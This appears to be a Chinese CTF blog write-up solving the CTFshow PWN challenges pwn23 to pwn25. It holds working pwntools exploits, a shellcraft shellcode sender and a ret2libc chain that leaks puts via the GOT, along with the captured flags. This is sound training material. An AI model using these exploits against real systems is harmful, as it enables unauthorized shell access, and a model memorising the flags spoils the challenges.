CTFSHOW-PWN入门-前置基础(pwn23-pwn25)

最新推荐文章于 2024-04-20 16:43:39 发布
最新推荐文章于 2024-04-20 16:43:39 发布
阅读量480 收藏 4
点赞数 15
分类专栏: CTF PWN 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2402_84133101/article/details/137792160
版权
CTF 同时被 2 个专栏收录
8 篇文章 0 订阅
订阅专栏
PWN
5 篇文章 0 订阅
订阅专栏

目录

pwn23

QQ20240414-104259@2x

QQ20240414-104713@2x

ctfshow函数是一个可以利用栈溢出的strcpy函数,我们就要尽可能的输入更多的字符串以让程序发生溢出。

QQ20240414-104610@2x

ssh连接靶机,拿到shell,获得flag

QQ20240414-154324@2x

flag:ctfshow{aa1dfcf7-647f-4c27-bbab-77c6f56e1dbc}

pwn24

QQ20240414-154554@2x

题目提示使用pwntools的shellcraft模块进行攻击,因此直接编写exp

from pwn import *
p = remote("pwn.challenge.ctf.show",28250)
payload = asm(shellcraft.sh())
p.sendline(payload)
p.interactive()

拿到shell,获得flag

QQ20240414-155420@2x

flag:ctfshow{66e295ca-2861-46c7-9899-2be274968da9}

pwn25

QQ20240414-155927@2x

先使用checksec查看文件信息

QQ20240415-080823@2x

32位程序,使用IDA反编译,看到读入的buf为132个长度,而read()函数限制我们读入的长度位0x100,也就是256个长度,所以ctfshow()函数存在栈溢出。

QQ20240415-081046@2x

QQ20240415-081055@2x

使用cyclic计算栈偏移量,得出栈偏移量为140

QQ20240415-183639@2x

QQ20240415-183647@2x

使用objdump查看plt表中的函数,我们看到plt表中有puts函数也有write函数,这里我们使用puts函数来输出函数的内存地址。

QQ20240415-182805@2x

exp如下:

from pwn import *
from LibcSearcher import *

context(arch='i386',os='linux',log_level='debug')
elf = ELF('./1')
p = remote("pwn.challenge.ctf.show",28128)  

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.symbols['main']
payload0 = b'a' * 140 + p32(puts_plt)+p32(main_addr)+p32(puts_got)
p.sendline(payload0)

puts_addr = u32(p.recv(4)) 
print(hex(puts_addr))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
payload = b'a' * 140 + p32(system_addr) + b'a'*4 + p32(binsh_addr)

p.sendline(payload)
p.interactive()

getshell,拿到flag

QQ20240415-184042@2x
flag:ctfshow{6344406d-3bee-4a94-827e-90f4fb5944e8}

「已注销」
关注
  • 15
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow-pwn入门-前置基础pwn23-pwn25
T1ngSh0w的博客
06-19 1594
CTFshow-pwn入门-前置基础pwn23-pwn25
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 2971
本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
CTFshow-pwn入门-前置基础pwn26-pwn28
T1ngSh0w的博客
06-20 879
CTFshow-pwn入门-pwn26-pwn28
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 1788
ctfshow pwn入门-前置基础pwn13-pwn19
CTFshow-pwn入门-前置基础pwn5 - pwn12
T1ngSh0w的博客
06-17 1114
CTFshow-pwn入门-前置基础-pwn5-pwn12
CTFshow-pwn入门-前置基础pwn32-pwn34
T1ngSh0w的博客
06-21 626
CTFshow-pwn入门-前置基础pwn32-pwn34
CTFshow-pwn入门-前置基础
akdelt的博客
01-15 538
esi 存储的是 msg 的地址,然后寄存器间接寻址把 msg 地址的内容拿出来给 eax 了。我们直接用 ida 看看 080490E8 地址上的值就行了。:运行此文件,将得到的字符串以ctfshow{xxxxx}提交。计算一下 eax 寄存器的值就行了(好臭的 flag,悲。所以我们把下载好的 elf 文件拿去执行即可。:寄存器间接寻址方式结束后eax寄存器的值为?: 立即寻址方式结束后eax寄存器的值为?:寄存器寻址方式结束后edx寄存器的值为?:直接寻址方式结束后ecx寄存器的值为?
CTFshow-pwn入门-前置基础pwn29-pwn31
T1ngSh0w的博客
06-21 1422
CTFshow-pwn入门-前置基础pwn29-pwn31(绕过PIE-pwn31)
CTFSHOW-PWN入门-前置基础(pwn26-pwn29)
2402_84133101的博客
04-18 285
sysctl -w kernel.randomize_va_space=0或者。根据题目提示,修改ASLR参数值即可得到flag。根据题目提示,修改ASLR参数值即可得到flag。根据题目提示,修改ASLR参数值即可得到flag。修改ASLR参数值为0即可得到正确的flag。
CTFshow-PWN-前置基础pwn24-pwn25
Welcome To Myon'Blog !
04-20 472
你可以使用pwntools的shellcraft模块来进行攻击32位程序,只开了部分 RELRO 保护可以看到多出了一个 RWX: Has RWX segments这意味着二进制文件中存在至少一个段(通常是代码段),它同时拥有读、写、执行权限反编译尝试跟进 ctfshow 函数但是不行这个是它的汇编代码:使用 python 运行:拿到 shell执行命令拿到 flag:ctfshow{f615f3c6-b99a-4590-ac95-1f7baf5b974b}
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8232
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
led-Opt.Bak
最新发布
05-21
毕设&课设&项目&实训- 【项目资源】: 包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。 包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】: 所有源码都经过严格测试,可以直接运行。 功能在确认正常工作后才上传。 【适用人群】: 适用于希望学习不同技术领域的小白或进阶学习者。 可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】: 项目具有较高的学习借鉴价值,也可直接拿来修改复刻。 对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】: 有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。 鼓励下载和使用,并欢迎大家互相学习,共同进步。
【图像加密解密】基于matlab菲涅尔域双随机相位编码图像加密解密【含Matlab源码 4548期】.mp4
05-21
Matlab研究室上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
人工智能项目+OpenCV+实例分割+Cpp实现+模型部署+qt界面+完全可用版+C++
05-21
【内容概要】 本C++项目,集成OpenCV库与实例分割模型,实现了对图像中不同对象的精确分割。项目采用先进的实例分割算法,并以C++为核心开发语言,搭配Qt框架构建用户友好型图形界面。完成模型训练后,实现了模型的高效部署,用户可直接通过QT界面上传图片,以及选择模型地址,就可获取分割后的结果。 【适用人群】 适合C++开发者、CV工程师、机器学习研究者及对AI技术有浓厚兴趣的学生群体。 【使用场景】 广泛适用于工业检测、医学影像分析、农林业病虫害识别、智能监控系统及AR增强现实等领域。无论是学术研究中的数据预处理,还是企业级产品中的图像分析功能开发,该项目都能提供坚实的技术支撑。 【目标】 项目旨在通过实战演练,帮助开发者掌握从理论到实践的全过程:包括模型选择与优化、C++接口的OpenCV操作、Qt界面设计与交互逻辑实现,直至模型的高效部署与应用。最终目标是打造一个即拿即用的实例分割工具,促进AI技术在多领域的落地应用,同时提升开发者在复杂项目。
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值